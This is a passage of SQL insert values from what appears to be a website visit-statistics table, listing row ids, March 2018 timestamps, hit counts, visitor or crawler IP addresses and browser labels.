77.215','chrome'),(220914,1521129107,1,1,0,0,'8.29.198.27','other'),(220915,1521129204,1,1,0,0,'34.239.248.162','other'),(220916,1521129331,1,1,0,0,'54.36.148.244','other'),(220917,1521129453,1,1,0,0,'52.72.78.96','other'),(220918,1521129461,1,1,0,0,'178.154.171.88','other'),(220919,1521129491,1,1,0,0,'54.36.149.88','other'),(220920,1521129595,1,1,0,0,'95.67.211.71','chrome'),(220921,1521129702,1,1,0,0,'165.227.129.3','chrome'),(220922,1521129788,1,1,0,0,'54.36.148.50','other'),(220923,1521129836,1,0,1,0,'66.249.66.195',''),(220924,1521129907,1,1,0,0,'54.36.149.15','other'),(220925,1521130116,2,2,0,0,'34.239.248.162','other'),(220926,1521130172,1,1,0,0,'165.227.141.239','chrome'),(220927,1521130224,1,1,0,0,'141.8.142.74','other'),(220928,1521130383,1,1,0,0,'52.72.78.96','other'),(220929,1521130665,1,1,0,0,'54.36.148.217','other'),(220930,1521131012,1,1,0,0,'188.230.43.254','other'),(220931,1521131022,1,1,0,0,'54.36.149.37','other'),(220932,1521131030,1,1,0,0,'54.197.45.201','other'),(220933,1521131160,1,1,0,0,'54.36.148.176','other'),(220934,1521131300,1,1,0,0,'52.72.78.96','other'),(220935,1521131626,1,1,0,0,'54.36.148.35','other'),(220936,1521131898,1,1,0,0,'54.157.35.206','other'),(220937,1521132229,1,1,0,0,'52.72.78.96','other'),(220938,1521132397,1,1,0,0,'141.8.142.74','other'),(220939,1521133090,1,1,0,0,'217.69.133.249','other'),(220940,1521133130,1,1,0,0,'52.72.78.96','other'),(220941,1521133387,1,1,0,0,'188.230.43.254','other'),(220942,1521133407,1,1,0,0,'54.36.148.202','other'),(220943,1521133586,1,1,0,0,'54.197.45.201','other'),(220944,1521133598,1,1,0,0,'91.196.178.55','chrome'),(220945,1521133649,2,2,0,0,'54.36.148.138','other'),(220946,1521134081,1,1,0,0,'52.72.78.96','other'),(220947,1521134119,1,1,0,0,'217.69.134.185','other'),(220948,1521134179,1,1,0,0,'54.36.148.89','other'),(220949,1521134196,1,1,0,0,'54.36.149.44','other'),(220950,1521134212,11,11,0,0,'54.157.35.206','other'),(220951,1521134257,1,1,0,0,'54.36.148.124','other'),(220952,1521134344,1,1,0,0,'54.36.149.9','other'),(220953,1521134575,1,1,0,0,'141.8.142.74','other'),(220954,1521135003,1,1,0,0,'52.72.78.96','other'),(220955,1521135023,1,1,0,0,'217.69.133.5','other'),(220956,1521135060,3,3,0,0,'34.239.248.162','other'),(220957,1521135129,1,1,0,0,'54.36.148.112','other'),(220958,1521135183,1,1,0,0,'54.36.149.107','other'),(220959,1521135250,1,1,0,0,'54.36.148.226','other'),(220960,1521135532,1,1,0,0,'54.36.148.115','other'),(220961,1521135615,1,1,0,0,'54.197.45.201','other'),(220962,1521135914,1,1,0,0,'217.69.133.203','other'),(220963,1521135923,1,1,0,0,'52.72.78.96','other'),(220964,1521136209,3,3,0,0,'92.112.125.105','chrome'),(220965,1521136211,1,1,0,0,'34.239.248.162','other'),(220966,1521136543,1,1,0,0,'35.226.23.240','other'),(220967,1521136552,2,2,0,0,'141.8.142.74','other'),(220968,1521136590,1,1,0,0,'217.69.134.182','other'),(220969,1521136846,1,1,0,0,'52.72.78.96','other'),(220970,1521136940,1,1,0,0,'217.69.134.220','other'),(220971,1521137155,2,2,0,0,'87.250.224.46','other'),(220972,1521137158,2,2,0,0,'34.239.248.162','other'),(220973,1521137220,1,1,0,0,'217.69.134.155','other'),(220974,1521137458,1,1,0,0,'217.69.134.188','other'),(220975,1521137521,1,1,0,0,'40.77.167.56','other'),(220976,1521137536,1,1,0,0,'54.36.148.119','other'),(220977,1521137632,1,1,0,0,'217.69.134.176','other'),(220978,1521137650,1,1,0,0,'54.36.149.57','other'),(220979,1521137711,1,1,0,0,'54.197.45.201','other'),(220980,1521137790,1,1,0,0,'217.69.134.177','other'),(220981,1521137929,1,1,0,0,'217.69.133.3','other'),(220982,1521138045,1,1,0,0,'217.69.134.160','other'),(220983,1521138149,1,1,0,0,'34.239.248.162','other'),(220984,1521138195,1,1,0,0,'54.36.149.106','other'),(220985,1521138362,1,1,0,0,'54.36.148.53','other'),(220986,1521138721,1,0,1,0,'66.249.66.199',''),(220987,1521139121,1,1,0,0,'54.36.148.82','other'),(220988,1521139182,1,1,0,0,'54.36.149.81','other'),(220989,1521139349,1,1,0,0,'35.226.23.240','other'),(220990,1521139655,1,1,0,0,'54.36.148.253','other'),(220991,1521139804,2,2,0,0,'34.239.248.162','other'),(220992,1521139945,1,1,0,0,'8.29.198.26','other'),(220993,1521139951,1,1,0,0,'54.36.149.34','other'),(220994,1521140052,1,1,0,0,'54.36.149.16','other'),(220995,1521140065,1,1,0,0,'54.36.148.242','other'),(220996,1521140099,1,1,0,0,'54.36.148.179','other'),(220997,1521140383,1,1,0,0,'54.197.45.201','other'),(220998,1521140457,1,1,0,0,'54.36.148.154','other'),(220999,1521140606,1,1,0,0,'180.76.15.160','other'),(221000,1521140650,1,1,0,0,'54.36.149.27','other'),(221001,1521140768,1,1,0,0,'54.36.149.32','other'),(221002,1521141104,2,0,2,0,'66.249.66.201',''),(221003,1521141231,1,1,0,0,'54.36.148.112','other'),(221004,1521141767,1,1,0,0,'54.36.148.32','other'),(221005,1521142355,1,1,0,0,'54.197.45.201','other'),(221006,1521142469,1,1,0,0,'87.250.224.46','other'),(221007,1521142507,1,1,0,0,'54.36.148.190','other'),(221008,1521142794,1,1,0,0,'54.36.148.30','other'),(221009,1521142877,1,1,0,0,'54.36.148.186','other'),(221010,1521143088,1,0,1,0,'66.249.66.199',''),(221011,1521143116,1,1,0,0,'141.8.142.74','other'),(221012,1521143225,1,1,0,0,'54.36.148.159','other'),(221013,1521143259,1,1,0,0,'54.197.45.201','other'),(221014,1521143375,1,1,0,0,'54.36.148.114','other'),(221015,1521143490,3,3,0,0,'34.239.248.162','other'),(221016,1521143586,1,1,0,0,'54.36.148.80','other'),(221017,1521143603,1,1,0,0,'54.36.148.196','other'),(221018,1521143800,1,1,0,0,'35.226.23.240','other'),(221019,1521144306,2,1,1,0,'66.249.66.199',''),(221020,1521144352,1,1,0,0,'54.197.45.201','other'),(221021,1521144448,1,1,0,0,'34.239.248.162','other'),(221022,1521144606,1,1,0,0,'180.76.15.139','other'),(221023,1521144712,14,14,0,0,'23.237.4.26','other'),(221024,1521144971,1,1,0,0,'54.36.148.98','other'),(221025,1521145480,1,1,0,0,'66.249.66.201','chrome'),(221026,1521145532,1,1,0,0,'54.36.148.51','other'),(221027,1521145570,2,2,0,0,'178.154.171.88','other'),(221028,1521145574,1,1,0,0,'141.8.142.74','other'),(221029,1521145689,1,1,0,0,'54.36.149.68','other'),(221030,1521146184,2,2,0,0,'91.196.178.88','chrome'),(221031,1521146483,3,3,0,0,'91.196.178.58','chrome'),(221032,1521146514,1,1,0,0,'178.154.171.88','other'),(221033,1521146670,1,1,0,0,'35.226.23.240','other'),(221034,1521147287,1,1,0,0,'54.36.148.227','other'),(221035,1521147382,1,1,0,0,'141.8.142.74','other'),(221036,1521147404,1,1,0,0,'54.36.148.153','other'),(221037,1521147472,1,1,0,0,'54.36.149.54','other'),(221038,1521147665,1,1,0,0,'54.36.149.48','other'),(221039,1521148270,1,1,0,0,'54.36.148.26','other'),(221040,1521148597,8,8,0,0,'95.213.141.126','opera'),(221041,1521148604,1,1,0,0,'54.36.148.231','other'),(221042,1521148707,1,0,1,0,'66.249.66.201',''),(221043,1521148928,1,1,0,0,'54.36.148.27','other'),(221044,1521149050,1,1,0,0,'54.36.148.97','other'),(221045,1521149146,1,1,0,0,'54.36.149.105','other'),(221046,1521149393,2,2,0,0,'87.250.224.46','other'),(221047,1521149535,4,4,0,0,'95.213.141.126','opera'),(221048,1521149788,1,1,0,0,'54.36.149.67','other'),(221049,1521150658,2,2,0,0,'54.36.148.228','other'),(221050,1521150776,1,1,0,0,'8.29.198.26','other'),(221051,1521150819,1,1,0,0,'54.36.148.191','other'),(221052,1521150847,1,1,0,0,'178.154.171.88','other'),(221053,1521150876,1,1,0,0,'54.36.149.61','other'),(221054,1521151188,1,1,0,0,'54.36.148.207','other'),(221055,1521151722,1,1,0,0,'54.36.149.100','other'),(221056,1521152228,1,1,0,0,'54.36.148.52','other'),(221057,1521152263,2,2,0,0,'95.213.141.126','opera'),(221058,1521152566,1,1,0,0,'91.196.178.61','chrome'),(221059,1521152591,1,1,0,0,'34.239.248.162','other'),(221060,1521152601,1,1,0,0,'54.210.107.179','other'),(221061,1521152698,1,1,0,0,'54.36.148.39','other'),(221062,1521153416,1,1,0,0,'54.36.149.16','other'),(221063,1521153486,1,1,0,0,'54.36.148.179','other'),(221064,1521153517,1,1,0,0,'34.239.248.162','other'),(221065,1521153525,1,1,0,0,'54.210.107.179','other'),(221066,1521153628,1,1,0,0,'54.36.148.184','other'),(221067,1521153893,1,1,0,0,'91.196.178.61','chrome'),(221068,1521154036,1,1,0,0,'54.36.148.54','other'),(221069,1521154754,2,2,0,0,'141.8.142.74','other'),(221070,1521154806,2,2,0,0,'34.239.248.162','other'),(221071,1521154832,1,1,0,0,'54.36.148.129','other'),(221072,1521154891,1,1,0,0,'54.36.148.185','other'),(221073,1521155179,1,1,0,0,'54.36.149.17','other'),(221074,1521155653,1,1,0,0,'54.36.148.206','other'),(221075,1521155745,1,1,0,0,'54.36.148.86','other'),(221076,1521155769,1,1,0,0,'34.239.248.162','other'),(221077,1521156166,1,1,0,0,'54.36.149.33','other'),(221078,1521156173,3,3,0,0,'158.69.23.126','other'),(221079,1521156844,1,1,0,0,'141.8.142.74','other'),(221080,1521157040,1,1,0,0,'178.154.171.88','other'),(221081,1521157046,1,1,0,0,'54.36.148.41','other'),(221082,1521157264,1,1,0,0,'87.250.224.46','other'),(221083,1521157266,1,1,0,0,'54.36.148.203','other'),(221084,1521157340,1,1,0,0,'87.250.224.77','other'),(221085,1521157527,1,1,0,0,'54.36.149.92','other'),(221086,1521157609,1,1,0,0,'54.36.148.134','other'),(221087,1521158044,1,1,0,0,'40.77.167.126','other'),(221088,1521158126,2,2,0,0,'141.8.142.74','other'),(221089,1521158171,1,1,0,0,'54.36.148.208','other'),(221090,1521158190,1,1,0,0,'54.36.148.242','other'),(221091,1521158202,1,1,0,0,'35.226.23.240','other'),(221092,1521158425,1,1,0,0,'54.36.148.24','other'),(221093,1521159002,1,1,0,0,'54.36.148.159','other'),(221094,1521159060,1,1,0,0,'141.8.142.74','other'),(221095,1521159637,1,1,0,0,'54.36.148.209','other'),(221096,1521159722,1,1,0,0,'106.120.162.110','chrome'),(221097,1521159723,1,1,0,0,'106.120.162.94','chrome'),(221098,1521159761,1,1,0,0,'207.46.13.72','other'),(221099,1521159766,1,1,0,0,'178.154.171.88','other'),(221100,1521159887,1,1,0,0,'109.169.46.22','chrome'),(221101,1521159889,1,1,0,0,'216.244.66.237','other'),(221102,1521160011,1,1,0,0,'54.36.148.28','other'),(221103,1521160200,1,1,0,0,'87.250.224.46','other'),(221104,1521160614,1,1,0,0,'54.36.148.66','other'),(221105,1521160753,1,1,0,0,'141.8.142.74','other'),(221106,1521160907,1,1,0,0,'109.169.46.22','firefox'),(221107,1521161145,1,1,0,0,'54.36.148.27','other'),(221108,1521161436,1,1,0,0,'54.36.149.95','other'),(221109,1521161511,1,1,0,0,'216.244.66.237','other'),(221110,1521161603,1,1,0,0,'8.29.198.25','other'),(221111,1521161939,1,1,0,0,'54.36.148.58','other'),(221112,1521161956,1,0,1,0,'66.249.66.199',''),(221113,1521162011,2,2,0,0,'87.250.224.46','other'),(221114,1521162012,1,1,0,0,'54.36.149.24','other'),(221115,1521162401,1,1,0,0,'54.36.148.25','other'),(221116,1521162471,1,1,0,0,'54.36.148.175','other'),(221117,1521162525,1,0,1,0,'66.249.66.201',''),(221118,1521162618,1,1,0,0,'54.36.148.89','other'),(221119,1521162799,1,1,0,0,'54.36.148.186','other'),(221120,1521162838,5,5,0,0,'178.154.171.88','other'),(221121,1521162847,5,5,0,0,'141.8.142.74','other'),(221122,1521163002,1,1,0,0,'54.36.149.44','other'),(221123,1521163226,1,1,0,0,'54.36.149.43','other'),(221124,1521163486,1,1,0,0,'207.46.13.139','other'),(221125,1521163497,1,1,0,0,'87.250.224.46','other'),(221126,1521163557,1,1,0,0,'37.9.113.182','other'),(221127,1521163642,1,1,0,0,'54.36.148.84','other'),(221128,1521163722,1,1,0,0,'54.36.149.88','other'),(221129,1521163860,1,1,0,0,'54.36.148.30','other'),(221130,1521163952,1,1,0,0,'54.36.149.50','other'),(221131,1521164166,1,1,0,0,'54.36.148.139','other'),(221132,1521164839,1,1,0,0,'54.36.149.38','other'),(221133,1521164850,1,1,0,0,'216.244.66.237','other'),(221134,1521164933,1,1,0,0,'54.36.148.169','other'),(221135,1521164963,1,1,0,0,'54.36.148.25','other'),(221136,1521165363,1,1,0,0,'54.210.107.179','other'),(221137,1521165847,1,1,0,0,'54.36.149.92','other'),(221138,1521165961,2,2,0,0,'54.36.148.137','other'),(221139,1521166002,1,1,0,0,'54.36.149.12','other'),(221140,1521166274,1,1,0,0,'54.210.107.179','other'),(221141,1521166547,1,1,0,0,'54.36.148.34','other'),(221142,1521166647,1,1,0,0,'54.36.149.32','other'),(221143,1521166833,1,1,0,0,'180.76.15.32','other'),(221144,1521166988,1,1,0,0,'54.36.149.98','other'),(221145,1521167074,1,1,0,0,'54.36.149.8','other'),(221146,1521167287,1,1,0,0,'54.210.107.179','other'),(221147,1521167457,1,1,0,0,'54.36.148.44','other'),(221148,1521167510,1,1,0,0,'178.154.171.88','other'),(221149,1521167538,1,1,0,0,'40.77.167.126','other'),(221150,1521167665,1,1,0,0,'216.244.66.194','other'),(221151,1521167690,1,1,0,0,'54.36.148.229','other'),(221152,1521168197,1,1,0,0,'54.210.107.179','other'),(221153,1521168699,1,1,0,0,'54.36.148.157','other'),(221154,1521169195,2,2,0,0,'34.239.248.162','other'),(221155,1521169275,1,1,0,0,'54.210.107.179','other'),(221156,1521169495,1,1,0,0,'54.36.148.212','other'),(221157,1521169950,1,1,0,0,'54.36.149.64','other'),(221158,1521170075,2,2,0,0,'54.36.148.75','other'),(221159,1521170318,1,1,0,0,'35.226.23.240','other'),(221160,1521170327,1,1,0,0,'54.210.107.179','other'),(221161,1521170711,2,2,0,0,'34.239.248.162','other'),(221162,1521171007,1,1,0,0,'54.36.149.17','other'),(221163,1521171099,1,1,0,0,'109.169.46.22','firefox'),(221164,1521171213,9,9,0,0,'141.8.142.74','other'),(221165,1521171226,7,7,0,0,'178.154.171.88','other'),(221166,1521171231,1,1,0,0,'54.210.107.179','other'),(221167,1521171246,2,2,0,0,'141.8.132.19','other'),(221168,1521171251,4,4,0,0,'87.250.224.46','other'),(221169,1521171253,1,1,0,0,'37.9.113.182','other'),(221170,1521171261,1,1,0,0,'37.9.113.101','other'),(221171,1521171421,1,1,0,0,'216.244.66.237','other'),(221172,1521171521,1,1,0,0,'54.36.148.93','other'),(221173,1521171561,1,1,0,0,'35.226.23.240','other'),(221174,1521171698,1,1,0,0,'217.69.133.239','other'),(221175,1521171704,1,1,0,0,'54.36.148.62','other'),(221176,1521171818,1,1,0,0,'54.36.148.31','other'),(221177,1521171861,1,1,0,0,'207.46.13.139','other'),(221178,1521172074,1,1,0,0,'54.36.148.54','other'),(221179,1521172138,1,1,0,0,'54.210.107.179','other'),(221180,1521172436,1,1,0,0,'8.29.198.25','other'),(221181,1521172506,1,1,0,0,'54.36.149.101','other'),(221182,1521172558,2,2,0,0,'207.46.13.72','other'),(221183,1521172743,1,1,0,0,'54.36.148.112','other'),(221184,1521172815,1,1,0,0,'54.36.148.78','other'),(221185,1521172856,1,1,0,0,'54.36.148.155','other'),(221186,1521173045,1,1,0,0,'54.210.107.179','other'),(221187,1521173517,1,1,0,0,'54.36.148.93','other'),(221188,1521173946,1,1,0,0,'54.210.107.179','other'),(221189,1521174039,1,1,0,0,'35.226.23.240','other'),(221190,1521174375,1,1,0,0,'141.8.142.74','other'),(221191,1521174547,2,2,0,0,'34.239.248.162','other'),(221192,1521174910,1,1,0,0,'54.210.107.179','other'),(221193,1521175196,1,1,0,0,'54.36.149.55','other'),(221194,1521175396,1,1,0,0,'54.36.149.32','other'),(221195,1521175502,1,1,0,0,'54.36.149.52','other'),(221196,1521175818,2,2,0,0,'54.210.107.179','other'),(221197,1521175937,1,1,0,0,'54.36.148.181','other'),(221198,1521176213,1,1,0,0,'54.36.149.85','other'),(221199,1521176719,1,1,0,0,'54.210.107.179','other'),(221200,1521176859,1,1,0,0,'54.36.149.84','other'),(221201,1521177107,1,1,0,0,'54.36.148.145','other'),(221202,1521177246,1,1,0,0,'54.36.149.62','other'),(221203,1521177367,1,1,0,0,'207.46.13.139','other'),(221204,1521177569,1,1,0,0,'54.36.149.55','other'),(221205,1521177620,1,1,0,0,'54.210.107.179','other'),(221206,1521178522,1,1,0,0,'54.210.107.179','other'),(221207,1521178643,1,1,0,0,'37.9.113.134','other'),(221208,1521178776,1,1,0,0,'35.226.23.240','other'),(221209,1521178822,1,0,1,0,'66.249.66.195',''),(221210,1521179220,1,1,0,0,'54.36.148.228','other'),(221211,1521179376,1,1,0,0,'178.154.171.88','other'),(221212,1521179513,1,1,0,0,'54.210.107.179','other'),(221213,1521179517,1,0,1,0,'66.249.66.201',''),(221214,1521180143,1,1,0,0,'91.196.178.55','chrome'),(221215,1521180149,1,1,0,0,'54.36.148.65','other'),(221216,1521180546,1,1,0,0,'54.210.107.179','other'),(221217,1521181377,1,1,0,0,'217.69.133.70','other'),(221218,1521181563,1,1,0,0,'54.36.148.73','other'),(221219,1521181639,1,1,0,0,'54.36.148.243','other'),(221220,1521181687,2,2,0,0,'54.210.107.179','other'),(221221,1521181911,1,1,0,0,'54.36.148.61','other'),(221222,1521181977,1,1,0,0,'54.36.149.30','other'),(221223,1521182325,2,2,0,0,'91.196.178.93','chrome'),(221224,1521182580,1,1,0,0,'141.8.142.74','other'),(221225,1521182589,1,1,0,0,'54.210.107.179','other'),(221226,1521183235,1,1,0,0,'54.36.148.244','other'),(221227,1521183253,2,2,0,0,'77.111.244.69','chrome'),(221228,1521183258,8,8,0,0,'91.121.86.136','other'),(221229,1521183263,1,1,0,0,'8.29.198.27','other'),(221230,1521183513,1,1,0,0,'107.167.99.240','other'),(221231,1521183597,1,1,0,0,'54.210.107.179','other'),(221232,1521183740,1,1,0,0,'54.36.148.57','other'),(221233,1521183987,1,1,0,0,'95.134.216.58','chrome'),(221234,1521184054,1,1,0,0,'54.36.149.101','other'),(221235,1521184116,1,1,0,0,'91.124.137.33','chrome'),(221236,1521184123,1,1,0,0,'54.36.148.102','other'),(221237,1521184151,3,3,0,0,'178.154.171.88','other'),(221238,1521184244,1,1,0,0,'54.36.148.169','other'),(221239,1521184499,1,1,0,0,'54.210.107.179','other'),(221240,1521184657,2,2,0,0,'91.196.178.93','chrome'),(221241,1521184792,1,1,0,0,'54.36.149.7','other'),(221242,1521184997,1,1,0,0,'31.42.161.141','chrome'),(221243,1521185069,1,1,0,0,'54.36.148.215','other'),(221244,1521185107,4,4,0,0,'178.154.171.88','other'),(221245,1521185188,1,1,0,0,'216.244.66.246','other'),(221246,1521185226,3,3,0,0,'141.8.142.74','other'),(221247,1521185322,1,1,0,0,'54.36.148.178','other'),(221248,1521185345,1,1,0,0,'95.134.97.244','chrome'),(221249,1521185362,1,1,0,0,'31.43.16.147','chrome'),(221250,1521185402,1,1,0,0,'54.210.107.179','other'),(221251,1521185413,1,1,0,0,'54.36.148.79','other'),(221252,1521185446,2,2,0,0,'195.230.119.34','chrome'),(221253,1521185599,3,3,0,0,'87.250.224.46','other'),(221254,1521185911,1,1,0,0,'91.196.178.42','chrome'),(221255,1521185982,1,1,0,0,'207.46.13.139','other'),(221256,1521186026,1,1,0,0,'178.154.171.88','other'),(221257,1521186304,1,1,0,0,'54.210.107.179','other'),(221258,1521186336,3,3,0,0,'141.8.142.74','other'),(221259,1521186625,1,1,0,0,'54.36.149.14','other'),(221260,1521186646,2,2,0,0,'54.36.148.94','other'),(221261,1521186956,2,2,0,0,'91.196.178.42','chrome'),(221262,1521187129,1,1,0,0,'46.201.224.170','chrome'),(221263,1521187253,1,1,0,0,'54.210.107.179','other'),(221264,1521187406,1,1,0,0,'91.196.178.162','firefox'),(221265,1521187451,1,1,0,0,'54.36.148.34','other'),(221266,1521187636,1,0,1,0,'66.249.66.199',''),(221267,1521187655,1,1,0,0,'54.36.148.171','other'),(221268,1521187668,1,1,0,0,'54.36.148.53','other'),(221269,1521187917,2,2,0,0,'91.196.178.93','chrome'),(221270,1521188154,1,1,0,0,'54.210.107.179','other'),(221271,1521188259,1,1,0,0,'54.36.148.212','other'),(221272,1521188266,2,2,0,0,'95.213.141.126','opera'),(221273,1521188347,1,1,0,0,'207.46.13.139','other'),(221274,1521188350,1,1,0,0,'54.36.148.189','other'),(221275,1521188369,1,1,0,0,'91.196.178.167','chrome'),(221276,1521188848,1,1,0,0,'141.8.142.74','other'),(221277,1521188919,1,1,0,0,'40.77.167.126','other'),(221278,1521188996,1,1,0,0,'178.154.171.88','other'),(221279,1521189055,1,1,0,0,'54.210.107.179','other'),(221280,1521189056,1,1,0,0,'54.36.148.224','other'),(221281,1521189268,1,1,0,0,'54.36.148.127','other'),(221282,1521189269,1,1,0,0,'89.21.76.124','chrome'),(221283,1521189471,1,1,0,0,'91.209.11.236','other'),(221284,1521189737,1,1,0,0,'178.154.200.32','other'),(221285,1521189776,1,1,0,0,'54.36.149.44','other'),(221286,1521189958,1,1,0,0,'54.210.107.179','other'),(221287,1521190047,1,1,0,0,'178.154.171.60','other'),(221288,1521190226,1,1,0,0,'54.36.148.198','other'),(221289,1521190460,1,1,0,0,'5.45.207.83','other'),(221290,1521190499,1,1,0,0,'193.194.127.253','chrome'),(221291,1521190726,1,1,0,0,'35.226.23.240','other'),(221292,1521190863,1,1,0,0,'54.210.107.179','other'),(221293,1521191270,1,1,0,0,'109.169.46.22','firefox'),(221294,1521191271,1,1,0,0,'40.77.167.126','other'),(221295,1521191275,1,1,0,0,'54.36.148.158','other'),(221296,1521191464,1,1,0,0,'54.36.148.119','other'),(221297,1521191661,1,1,0,0,'54.36.148.73','other'),(221298,1521191770,1,1,0,0,'54.210.107.179','other'),(221299,1521191981,1,1,0,0,'54.36.149.34','other'),(221300,1521192611,3,3,0,0,'91.196.178.93','chrome'),(221301,1521192672,1,1,0,0,'54.210.107.179','other'),(221302,1521193361,1,1,0,0,'34.239.248.162','other'),(221303,1521193577,1,1,0,0,'54.210.107.179','other'),(221304,1521193796,1,1,0,0,'54.36.149.38','other'),(221305,1521194012,1,0,1,0,'66.249.66.195',''),(221306,1521194094,1,1,0,0,'8.29.198.25','other'),(221307,1521194105,1,1,0,0,'54.36.148.218','other'),(221308,1521194180,1,1,0,0,'54.36.148.179','other'),(221309,1521194226,1,1,0,0,'37.9.113.182','other'),(221310,1521194229,1,1,0,0,'54.36.149.95','other'),(221311,1521194255,1,1,0,0,'91.124.137.33','chrome'),(221312,1521194479,1,1,0,0,'54.210.107.179','other'),(221313,1521194918,1,1,0,0,'54.36.148.228','other'),(221314,1521195061,1,1,0,0,'37.9.113.138','other'),(221315,1521195062,1,1,0,0,'141.8.142.29','other'),(221316,1521195122,1,1,0,0,'54.36.149.4','other'),(221317,1521195220,1,1,0,0,'34.239.248.162','other'),(221318,1521195231,1,1,0,0,'54.36.148.153','other'),(221319,1521195381,1,1,0,0,'54.210.107.179','other'),(221320,1521195717,1,1,0,0,'217.69.133.251','other'),(221321,1521195848,1,1,0,0,'35.226.23.240','other'),(221322,1521195862,1,1,0,0,'141.8.132.19','other'),(221323,1521195884,1,1,0,0,'178.154.171.81','other'),(221324,1521196284,1,1,0,0,'54.210.107.179','other'),(221325,1521196426,1,1,0,0,'54.36.149.23','other'),(221326,1521196568,1,1,0,0,'37.9.113.114','other'),(221327,1521196571,1,1,0,0,'37.9.113.134','other'),(221328,1521196575,1,1,0,0,'87.250.224.46','other'),(221329,1521196578,1,1,0,0,'37.9.113.110','other'),(221330,1521196581,2,2,0,0,'37.9.113.157','other'),(221331,1521196584,2,2,0,0,'178.154.171.55','other'),(221332,1521196587,1,1,0,0,'5.45.207.83','other'),(221333,1521196624,1,1,0,0,'37.9.113.138','other'),(221334,1521196625,1,1,0,0,'37.9.113.56','other'),(221335,1521196628,1,1,0,0,'213.180.203.8','other'),(221336,1521196633,1,1,0,0,'5.45.207.58','other'),(221337,1521196638,1,1,0,0,'87.250.224.85','other'),(221338,1521197185,1,1,0,0,'54.210.107.179','other'),(221339,1521197499,1,1,0,0,'54.36.149.36','other'),(221340,1521197581,1,1,0,0,'54.36.148.155','other'),(221341,1521197611,1,1,0,0,'37.9.113.134','other'),(221342,1521197724,1,1,0,0,'217.69.133.235','other'),(221343,1521198088,1,1,0,0,'54.210.107.179','other'),(221344,1521198115,1,1,0,0,'54.36.149.80','other'),(221345,1521198189,1,1,0,0,'54.36.148.123','other'),(221346,1521198342,1,1,0,0,'91.196.178.90','firefox'),(221347,1521198423,1,1,0,0,'54.36.148.166','other'),(221348,1521198604,1,1,0,0,'91.196.178.50','chrome'),(221349,1521198607,1,1,0,0,'54.36.149.103','other'),(221350,1521198818,1,1,0,0,'109.169.46.22','chrome'),(221351,1521198831,1,1,0,0,'54.36.148.175','other'),(221352,1521198990,2,2,0,0,'54.210.107.179','other'),(221353,1521199087,1,1,0,0,'54.36.148.54','other'),(221354,1521199234,1,1,0,0,'91.209.11.236','other'),(221355,1521199245,1,1,0,0,'95.134.97.244','chrome'),(221356,1521199470,1,1,0,0,'178.154.171.88','other'),(221357,1521199893,1,1,0,0,'54.210.107.179','other'),(221358,1521200060,1,1,0,0,'54.36.149.96','other'),(221359,1521200074,1,1,0,0,'66.249.66.201','chrome'),(221360,1521200089,1,1,0,0,'66.249.66.158','chrome'),(221361,1521200396,1,1,0,0,'95.134.97.244','chrome'),(221362,1521200425,1,1,0,0,'54.36.148.42','other'),(221363,1521200796,2,2,0,0,'54.210.107.179','other'),(221364,1521200859,1,1,0,0,'34.239.248.162','other'),(221365,1521200946,1,1,0,0,'54.36.148.32','other'),(221366,1521201053,1,1,0,0,'54.36.149.14','other'),(221367,1521201167,1,1,0,0,'95.134.202.203','chrome'),(221368,1521201306,1,1,0,0,'141.8.142.74','other'),(221369,1521201438,1,1,0,0,'54.36.148.229','other'),(221370,1521201699,1,1,0,0,'54.210.107.179','other'),(221371,1521201748,1,0,1,0,'66.249.66.199',''),(221372,1521201932,1,1,0,0,'54.36.149.21','other'),(221373,1521201999,1,1,0,0,'54.36.148.237','other'),(221374,1521202117,1,1,0,0,'54.36.148.233','other'),(221375,1521202151,1,0,1,0,'66.249.66.156',''),(221376,1521202270,1,1,0,0,'34.239.248.162','other'),(221377,1521202449,1,1,0,0,'54.36.148.15','other'),(221378,1521202600,2,2,0,0,'54.210.107.179','other'),(221379,1521202715,2,2,0,0,'91.196.178.167','chrome'),(221380,1521203215,1,1,0,0,'34.239.248.162','other'),(221381,1521203329,1,1,0,0,'141.8.142.74','other'),(221382,1521203491,1,1,0,0,'54.36.149.22','other'),(221383,1521203632,2,2,0,0,'77.111.244.13','chrome'),(221384,1521203686,1,1,0,0,'54.36.149.91','other'),(221385,1521203748,1,1,0,0,'54.210.107.179','other'),(221386,1521203783,1,1,0,0,'91.196.177.46','chrome'),(221387,1521204356,1,1,0,0,'141.8.142.74','other'),(221388,1521204491,1,1,0,0,'34.239.248.162','other'),(221389,1521204671,1,1,0,0,'54.210.107.179','other'),(221390,1521204931,1,1,0,0,'8.29.198.25','other'),(221391,1521204945,1,1,0,0,'54.36.149.97','other'),(221392,1521205148,1,1,0,0,'77.52.201.102','firefox'),(221393,1521205367,1,1,0,0,'54.36.149.39','other'),(221394,1521205573,2,2,0,0,'54.210.107.179','other'),(221395,1521205939,1,1,0,0,'54.36.148.72','other'),(221396,1521205990,1,1,0,0,'5.35.22.54','chrome'),(221397,1521206161,1,0,1,0,'66.249.66.201',''),(221398,1521206476,1,1,0,0,'54.210.107.179','other'),(221399,1521206654,1,1,0,0,'54.36.149.91','other'),(221400,1521206913,1,1,0,0,'54.36.148.161','other'),(221401,1521207056,1,1,0,0,'54.36.148.205','other'),(221402,1521207217,1,1,0,0,'178.154.171.88','other'),(221403,1521207410,1,1,0,0,'54.210.107.179','other'),(221404,1521207783,1,1,0,0,'46.161.9.39','chrome'),(221405,1521207950,1,1,0,0,'54.36.148.106','other'),(221406,1521208080,1,1,0,0,'92.112.63.137','firefox'),(221407,1521208084,1,1,0,0,'54.36.148.181','other'),(221408,1521208355,1,1,0,0,'54.210.107.179','other'),(221409,1521208470,1,1,0,0,'54.36.148.202','other'),(221410,1521208647,1,1,0,0,'54.36.148.120','other'),(221411,1521208706,1,1,0,0,'35.226.23.240','other'),(221412,1521208769,1,1,0,0,'91.124.137.33','chrome'),(221413,1521208894,2,2,0,0,'37.9.113.138','other'),(221414,1521208900,1,1,0,0,'178.154.200.7','other'),(221415,1521208903,1,1,0,0,'87.250.224.77','other'),(221416,1521208907,2,2,0,0,'213.180.203.8','other'),(221417,1521208916,1,1,0,0,'141.8.132.19','other'),(221418,1521208961,1,1,0,0,'37.9.113.115','other'),(221419,1521209130,1,1,0,0,'157.55.39.228','other'),(221420,1521209326,1,1,0,0,'54.36.148.35','other'),(221421,1521209522,2,2,0,0,'54.210.107.179','other'),(221422,1521209915,1,1,0,0,'54.36.148.11','other'),(221423,1521210274,1,1,0,0,'54.36.148.30','other'),(221424,1521210427,1,1,0,0,'54.210.107.179','other'),(221425,1521210824,2,2,0,0,'178.154.171.88','other'),(221426,1521211110,1,1,0,0,'141.8.142.74','other'),(221427,1521211378,1,1,0,0,'54.21